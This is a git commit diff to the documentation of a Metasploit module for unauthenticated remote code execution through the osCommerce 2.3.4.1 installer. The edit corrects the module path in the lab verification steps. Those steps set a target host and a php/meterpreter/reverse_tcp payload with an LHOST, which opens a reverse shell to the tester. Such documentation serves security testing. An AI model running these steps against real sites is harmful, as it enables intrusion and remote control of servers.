Update oscommerce_installer_unauth_code_exec.md
parent
f50b42ec52
commit
09bbbf82ba
|
@ -5,7 +5,7 @@ osCommerce version 2.3.4.1 is vulnerable to remote code execution. If the `/inst
|
|||
## Verification Steps
|
||||
|
||||
1. Download and install [osCommerce 2.3.4.1](https://www.exploit-db.com/apps/ce2796b352d6e0fb4e9f03866ae98541-oscommerce-2.3.4.zip)
|
||||
2. `use exploit/multi/http/oscommerce`
|
||||
2. `use exploit/multi/http/oscommerce_installer_unauth_code_exec`
|
||||
3. `set RHOST IP`
|
||||
4. `set PAYLOAD php/meterpreter/reverse_tcp`
|
||||
5. `set LHOST IP`
|
||||
|
|
Loading…
Reference in New Issue